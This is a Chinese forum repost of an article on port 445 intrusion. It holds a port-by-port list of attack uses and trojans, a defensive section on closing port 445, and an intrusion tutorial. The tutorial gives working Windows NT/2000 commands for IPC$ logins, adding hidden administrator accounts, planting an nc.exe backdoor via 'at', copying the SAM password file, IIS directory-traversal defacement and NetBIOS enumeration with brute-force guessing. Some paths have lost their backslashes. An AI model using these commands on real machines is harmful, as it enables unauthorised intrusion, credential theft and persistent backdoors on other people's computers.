文浩资源

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 13|回复: 0

445端口入侵详解

[复制链接]

0

主题

0

帖子

-2万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
-20126
发表于 2019-9-13 23:46:11 | 显示全部楼层 |阅读模式
篇一:黑客常用入侵端口详解

常见的入侵端口:

端口:0

服务:Reserved

说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果。一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。

(我被这样入侵过,一般感觉计算机运行慢或是你感觉有问题存在,先去查ip,如果有入侵赶紧断掉网,如果晚了他可能就会盗取你很多帐号或资料.)

-

端口:1

服务:tcpmux

说明:这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户,如:IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。

-

端口:7

服务:Echo

说明:能看到许多人搜索Fraggle放大器时,发送到X.X.X.0和X.X.X.255的信息。 -

端口:19

服务:Character Generator

说明:这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包,受害者为了回应这些数据而过载。

-

端口:21

服务:FTP

说明:FTP服务器所开放的端口,用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。

-

端口:22

服务:Ssh

说明:PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点,如果配置成特定的模式,许多使用RSAREF库的版本就会有不少的漏洞存在。

-

端口:23

服务:Telnet

说明:远程登录,入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术,入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。

-

端口:25

服务:SMTP

说明:SMTP服务器所开放的端口,用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭,他们需要连接到高带宽的E-MAIL服务器上,将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。

-

端口:31

服务:MSG Authentication

说明:木马Master Paradise、Hackers Paradise开放此端口。

-

端口:42

服务:WINS Replication

说明:WINS复制

-

端口:53

服务:Domain Name Server(DNS)

说明:DNS服务器所开放的端口,入侵者可能是试图进行区域传递(TCP),欺骗DNS(UDP)或隐藏其他的通信。因此防火墙常常过滤或记录此端口。

-

端口:67

服务:Bootstrap Protocol Server

说明:通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们,分配一个地址把自己作为局部路由器而发起大量中间人(man-in-middle)攻击。客户端向68端口广播请求配置,服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。

-

端口:69

服务:Trival File Transfer

说明:许多服务器与bootp一起提供这项服务,便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。 -

端口:79

服务:Finger Server

说明:入侵者用于获得用户信息,查询操作系统,探测已知的缓冲区溢出错误,回应从自己机器到其他机器Finger扫描。

-

端口:80

服务:HTTP

说明:用于网页浏览。木马Executor开放此端口。

-

端口:99

服务:metagram Relay

说明:后门程序ncx99开放此端口。

-

端口:102

服务:Message transfer agent(MTA)-X.400 over TCP/IP

说明:消息传输代理。

-

端口:109

服务:Post Office Protocol -Version3

说明:POP3服务器开放此端口,用于接收邮件,客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个,这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。

-

端口:110

服务:SUN公司的RPC服务所有端口

说明:常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等 -

端口:113

服务:Authentication Service

说明:这是一个许多计算机上运行的协议,用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器,尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务,将会看到许多这个端口的连接请求。记住,如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。 -

端口:119

服务:Network News Transfer Protocol

说明:NEWS新闻组传输协议,承载USENET通信。这个端口的连接通常是人们在寻找USENET服务器。多数ISP限制,只有他们的客户才能访问他们的新闻组服务器。打开新闻组服务器将允许发/读任何人的帖子,访问被限制的新闻组服务器,匿名发帖或发送SPAM。 -

端口:135

服务:Location Service

说明:Microsoft在这个端口运行DCE RPC end-point mapper为它的DCOM服务。这与UNIX 111端口的功能很相似。使用DCOM和RPC的服务利用计算机上的end-point mapper注册它们的位置。远端客户连接到计算机时,它们查找end-point mapper找到服务的位置。HACKER扫描计算机的这个端口是为了找到这个计算机上运行Exchange Server吗?什么版本?还有些DOS攻击直接针对这个端口。

-

端口:137、138、139

服务:NETBIOS Name Service

说明:其中137、138是UDP端口,当通过网上邻居传输文件时用这个端口。而139端口:通过这个端口进入的连接试图获得NetBIOS/SMB服务。这个协议被用于windows文件和打印机共享和SAMBA。还有WINS Regisrtation也用它。

-

端口:143

服务:Interim Mail Access Protocol v2

说明:和POP3的安全问题一样,许多IMAP服务器存在有缓冲区溢出漏洞。记住:一种LINUX蠕虫(admv0rm)会通过这个端口繁殖,因此许多这个端口的扫描来自不知情的已经被感染的用户。当REDHAT在他们的LINUX发布版本中默认允许IMAP后,这些漏洞变的很流行。这一端口还被用于IMAP2,但并不流行。

-

端口:161

服务:SNMP

说明:SNMP允许远程管理设备。所有配置和运行信息的储存在数据库中,通过SNMP可获得这些信息。许多管理员的错误配置将被暴露在Internet。Cackers将试图使用默认的密码public、private访问系统。他们可能会试验所有可能的组合。SNMP包可能会被错误的指向用户的网络。

-

端口:177

服务:X Display Manager Control Protocol

说明:许多入侵者通过它访问X-windows操作台,它同时需要打开6000端口。

-

端口:389

服务:LDAP、ILS

说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。 -

端口:443

服务:Https

说明:网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP。

-

端口:456

服务:[NULL]

说明:木马HACKERS PARADISE开放此端口。

-

端口:513

服务:Login,remote login

说明:是从使用cable modem或DSL登陆到子网中的UNIX计算机发出的广播。这些人为入侵者进入他们的系统提供了信息。

-

端口:544

服务:[NULL]

说明:kerberos kshell

-

端口:548

服务:Macintosh,File Services(AFP/IP)

说明:Macintosh,文件服务。

-

端口:553

服务:CORBA IIOP (UDP)

说明:使用cable modem、DSL或VLAN将会看到这个端口的广播。CORBA是一种面向对象的RPC系统。入侵者可以利用这些信息进入系统。

-

端口:555

服务:DSF

说明:木马PhAse1.0、Stealth Spy、IniKiller开放此端口。

-

端口:568

服务:Membership DPA

说明:成员资格 DPA。

-

端口:569

服务:Membership MSN

说明:成员资格 MSN。

-

端口:635

服务:mountd

说明:Linux的mountd Bug。这是扫描的一个流行BUG。大多数对这个端口的扫描是基于UDP的,但是基于TCP的mountd有所增加(mountd同时运行于两个端口)。记住mountd可运行于任何端口(到底是哪个端口,需要在端口111做portmap查询),只是Linux默认端口是635,就像NFS通常运行于2049端口。

-

端口:636

服务:LDAP

说明:SSL(Secure Sockets layer)

-

端口:666

服务:Doom Id Software

说明:木马Attack FTP、Satanz Backdoor开放此端口

-

端口:993

服务:IMAP

说明:SSL(Secure Sockets layer)

-

端口:1001、1011

服务:[NULL]

说明:木马Silencer、WebEx开放1001端口。木马Doly Trojan开放1011端口。 -

端口:1024

服务:Reserved

说明:它是动态端口的开始,许多程序并不在乎用哪个端口连接网络,它们请求系统为它们分配下一个闲置端口。基于这一点分配从端口1024开始。这就是说第一个向系统发出请求的会分配到1024端口。你可以重启机器,打开Telnet,再打开一个窗口运行natstat -a 将会

篇二:445端口

445端口,一个既让人爱,又招人恨的端口,有了它,网民们可以在局域网中轻松访问各种共享文件夹或共享打印机,但正因为有了它,Internet上 的“恶人”们才有了“可乘之机”,他们能躲在Internet上的“阴暗角落”里,偷偷共享你的硬盘,甚至会在悄无声息中,将你的硬盘格式化掉!面对如此 猖獗、疯狂的攻击,你能做的,就是运用自己的智慧,与Internet上的“大恶人”们,“决战”于445端口之巅!为了助你“敲”开胜利之门,本文特“ 传授”你如下决战秘诀,仅供参考。

端口排除法

单击“开始” →“设置” →“网络和拨号连接” →“Internet连接”,选中“属性”选项,弹出Internet连接属性窗口;

打开“常规”标签页面,选中“Internet协议(TCP/IP)”,单击“属性”,再单击属性页面中的“高级”按钮,打开高级TCP/IP设置窗 口,选中“选项”标签,并在该标签页面的“可选的设置”项中,将“TCP/IP筛选”选中,同时单击“属性”,打开设置窗口(如图1);

图1

由于445端口属于一种TCP端口,你可以在对应“TCP端口”的设置项处,将“只允许”项选中,激活下面的“添加”按钮,单击该按钮,在其后打开的“ 添加筛选器”窗口中,将必须用到的几个服务端口号码,都添加进来,而将用不到的445端口号码排除在外,设置完毕后,单击“确定”按钮,就可以让设

置生效 了。

服务关闭法

考虑到文件夹或打印机共享服务,才会利用到445端口,因此直接将文件夹或打印机共享服务停止掉,同样也能实现关闭445端口的目的:

按前面方法,打开“Internet连接”属性窗口;在“常规”标签页面中,将“此连接使用下列选定的组件”列表框中的“Microsoft网络的文件或打印机共享”选项取消,再单击“确定”,重新启动系统就可以了。

当然,你也可以利用本地安全设置中的“用户权利指派”功能,指定

Internet上的任何用户都无权访问本地主机,从而实现间接关闭445端口的目的:

依次单击“开始” →“程序” →“管理工具” →“本地安全设置”选项,展开“安全设置” →“本地策略” →“用户权利指派”文件夹,双击“拒绝从网络访问这台计算机”(如图2);继续单击“添加”,选中“everyone”选项,再单击“添加”、“确定”, 这样任何一位外来访问者,都无法从网络访问到本地主机了。不过该方法,“打击”范围比较广,造成的后果是无论是“敌人”,还是“良民”,都无法访问到共享 资源了,因此这种方法,适宜在保存有绝对机密信息的服务器中使用。

图2

注册表设置法

这种方法,是通过修改注册表,将用于文件夹或打印机共享的服务禁止掉,具体操作方法为:

依次展开注册表分支

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBT

Parameters,在右边窗口中新创建“SMBDeviceEnabled”双字节值,再将其设置为“0”,然后重新启动一下系统就OK了。

防火墙设置法

这种方法,是利用防火墙的安全过滤规则,将通过445端口的任何数据包拦截下来。比方说,启动“KV3000的反黑王防火墙”,单击“防火墙控制”处的“规则设置”按钮,再单击“增加规则”,打开图3界面;

在该界面的名称设置项处,输入“关闭445端口”,在“网络条件”处,选中“接受数据包”,并将对方IP地址设置为“任何地址”,将本地IP地址设置为“指定本地IP地址”,然后输入本地主机的IP地址。

单击“TCP”标签,并在本地端口处,选中“指定端口”,并输入“445”;在“对方端口”处,选中“任一端口”选项。

图3

在“规则对象”处,选中“系统访问网络时”,在“当所有条件满足时”处,选中“拦截”,最后单击“确定”,完成安全过滤规则的创建。返回到反黑王防火墙 的规则设置窗口,选中刚刚创建好的“关闭445端口”的过滤规则,如此一来,来自445端口的各种非法入侵,都会被反黑王防火墙自动拦截。

组策略设置法

依次单击“开始”→“程序”→“管理工具”→“本地安全策略”,打开一个本地组策略编辑界面,右击“IP安全策略,在本地机器”,执行“创建IP安全策略”命令,弹出一个创建向导界面;

单击“下一步”,在“名称”处,输入“关闭445端口”,再单击“下一步”,选中“激活默认响应规则”,其余参数均设置为默认值,就可以完成新安全策略 的创建操作了;单击“添加”,继续单击“下一步”,选中“此规则不指定隧道”,然后将“网络类型”设置为“所有网络连接”,接着选中“Windows 2000默认值??”选项,再单击“下一步”,在IP筛选器列表界面中单击“添加”,将IP筛选器名称设置为“阻止445端口”,单击“添加”,再将源地 址设置为“任何IP地址”,将目标地址设置为“我的IP地址”,继续单击“下一步”,选中“TCP”;

在随后的窗口中,选中“从 任意端口到此端口”,并输入“445”,最后依次单击“完成”、“关闭”,返回到IP筛选器列表页面;然后选中“阻止445端口”筛选器,单击“下一步 ”,选中“拒绝”选项,再依次单击“下一步”、“完成”按钮,就能将“阻止445端口”的筛选器,添加到名为“关闭445端口”的IP安全策略中了,再单 击“确定”按钮,返回到“本地安全设置”窗口中。

最后,在“本地安全设置”窗口中,右击“关闭445端口”策略,从弹出的快捷菜单中,依次单击“所有任务”/“指派”命令,就能使上述设置生效了。

篇三:网络入侵命令详解

网络入侵命令详解

1:NET

只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!

这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1

net use \127.0.0.1ipc$ 123456 /user:hbx null密码为空

退出的命令是

net use \127.0.0.1ipc$ /删除

--------------------------------

net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:winntsystem32 这样这个机器就有了一个名为me的共享目录,而打开它就是winnt下的system32目录,如果你用win2000的系统就知这个目录有多重要了,如果不想要也好办net share me /删除 呵呵,没有了,是不是很方便的啊。

---------------------- ---------------------- ----------------------

下面的操作你必须登陆后才可以用.登陆的方法就在上面.

---------------------- ---------------------- ----------------------

下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功,那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add

----------------------

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z:\127.0.0.1c$

----------------------

net start telnet

这样可以打开对方的TELNET服务.

----------------------

这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

net user guest /active:yes

----------------------

net user guest /active:no这样这个guest的用户就又被禁用了

----------------------

这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!

net user guest lovechina

有人问到提高权限的问题 下面就解决下

net localgroup administrators guest /add

将guest变为administrator

net命令果然强大啊! net view命令看对方开了共享

-------------------------------------------------------------------------------------------------------------

net user是查看所有用户列表,看看哪个用户是和你一样偷跑进来的,给他名给删掉,让他美,

net user 用户名 /删除哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net localgroup administrators就列出管理员组成员了,再查看一下administrator这个用户,因为这个是创建系统时建出来的,所以要看看他的系统是什么时间创建出来的

net user administrator,然后再查看别的管理员用户是什么时间创建的,如果相差太远,那可能是被别人偷偷跑来偷建的,一律del,安全第一哦................

---------------------------------------------------------------------------------------------------------------------------

2:at

一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?

那么需要用AT命令,这里假设你已经登陆了那个服务器。

----------------------

你首先要得到对方的时间,

net time \127.0.0.1

----------------------

将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1

at \127.0.0.1 12:3 nc.exe

这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

-----------------------------------------------------

at命令功能强大,下面可以打个比方:

C:> AT 22:30 Start C:prettyboy.mp3

新加了一项作业,其作业 ID = 1 [现在我们新建立了一个任务 在22:30分 系统将自动播放歌曲]

---------------------------------------------------------------------------------------------------------------------------

3:telnet

这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.

---------------------------------------------------------------------------------------------------------------------------

4:FTP

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给WWW.51.NET,不错的.当我们申请完后,...?约癋TP服务器. 在上传前需要登陆先,这里我们假设FTP服务器WWW.51.NET,用户名是HUCJS,密码是654321

ftp

他会要求输入用户,成功后会要求输入密码.

----------------------

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:下,传到对方D: get c:index.htm d:

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

put c:index.htm d:

--------------------------------------------------

这里的问题是两个命令的解释正好弄反了,登陆FTP服务器后get才是下载,而put命令是上传,这和tftp的命令正好相反,在tftp命令里get是上传put是下载,这下明白了吧,而且在FTP服务器中不能用c:和d:这样来指明路径,这也是在tftp里面用的方法,FTP可不会执行的,不信你去试好了,正确应该这样上传文件put index.htm这样就足够了,装c盘根目录下的index.htm文件上传到FTP服务器的当前目录下,不喜欢就del index.htm删掉这文件,下载时先查看一下目录,dir然后看这个目录里有什么,有你要的你就get index.htm这样就把index.htm这个文件下载到你自己的c盘根目录下了。

--------------------------------------------------------------

get index.htm c:inetpubwwwrootindex.htm(这里是把你空间上的index.htm下载到对方的c:inetpubwwwrootindex.htm)"

这句的解释里就没有出现错误,呵呵,看来那以前的还是马虎所至吧

好了,总算找出错处了吧,再说下面吧。

---------------------------------------------------------------------------------------------------------------------------

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去, 需要建立好IPC$连接才有效。 这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

copy index.htm \127.0.0.1c$index.htm

----------------------

如果你要复制到D盘下 把C改为D, 就行了!

copy index.htm \127.0.0.1d$index.htm

----------------------

如果你要把他复制到 WINNT 目录里

就要把输入

copy index.htm \127.0.0.1admin$index.htm

admin$是winnt

---------------------

要把对方的文件复制过来,顺便告诉大家 NT的备份的数据库放在x:winnt
epairsam._ sam._是数据库的文件名

---------------------- ----------------------

下面就把127.0.0.1的数据库复制到本地C盘下

copy \127.0.0.1admin$
epairsam._ c:

这个sam._这明显是NT主机的口令档,如果是win2000机器的口令文件应该是sam ---------------------------------------------------------------------------------------------------------------------------

6:set

如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!

下面是我得到的结果!我来分析它,只是找主页在那而已。

COMPUTERNAME=PENTIUMII

ComSpec=D:WINNTsystem32cmd.exe

CONTENT_LENGTH=0

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=*/*

HTTP_ACCEPT_LANGUAGE=zh-cn

HTTP_CONNECTION=Keep-Alive

HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了

HTTP_ACCEPT_ENCODING=gzip, deflate

HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1

Os2LibPath=D:WINNTsystem32os2dll;

OS=Windows_NT

Path=D:WINNTsystem32;D:WINNT

PATHEXT=.COM;.EXE;.BAT;.CMD

PATH_TRANSLATED=E:vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:vlroot

PROCESSOR_ARCHITECTURE=x86

PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6

PROCESSOR_REVISION=0303

PROMPT=$P$G

QUERY_STRING=/c+set

REMOTE_ADDR=XX.XX.XX.XX

REMOTE_HOST=XX.XX.XX.XX

REQUEST_METHOD=GET

SCRIPT_NAME=/脚本s/..%2f../winnt/system32/cmd.exe

SERVER_NAME=XX.XX.XX.XX

SERVER_PORT=80

SERVER_PORT_SECURE=0

SERVER_PROTOCOL=HTTP/1.1

SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0

SystemDrive=D:

SystemRoot=D:WINNT

TZ=GMT-9

USERPROFILE=D:WINNTProfilesDefault User

windir=D:WINNT

粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用

这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。

---------------------------------------------------------------------------------------------------------------------------

7:nbtstat

如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!

现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。 命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

这个我认为大不大写没有太大差别,用处还是一样的。

之后用net use \对方IP 连接一下!

net view \对方IP 查看对方共享文件夹

net use X: \IP对方共享文件 映射对方共享文件夹成为本机的X盘

这就是139端口的基本用法!不过前提是必须对方开共享!

netstat -n看看谁连接你

-----------------

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered

MAC Address = 00-E0-29-14-35-BA

PENTIUMII <00> UNIQUE

PENTIUMII <20> UNIQUE

ORAHOTOWN <00> GROUP

ORAHOTOWN <1C> GROUP

ORAHOTOWN <1B> UNIQUE

PENTIUMII <03> UNIQUE

INet~Services <1C> GROUP

IS~PENTIUMII...<00> UNIQUE

ORAHOTOWN <1E> GROUP

ORAHOTOWN <1D> UNIQUE

..__MSBROWSE__.<01> GROUP

粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是 <03> 的话,那他前面的就是用户. 这里的用户是PENTIUMII。 没有03说明:MAC没和IP捆在一起了

----------------------------------------------------------------------------------------------------------------------


《445端口入侵详解》出自:百味书屋
链接地址:http://www.850500.com/news/70331.html
转载请保留,谢谢!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

代学代考网络课程远程培训

QQ|手机版|文浩资源 ( 湘ICP备17017632号 )文浩资源

GMT+8, 2024-12-24 10:56 , Processed in 0.385014 second(s), 22 queries .

Powered by Discuz! X3.4

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表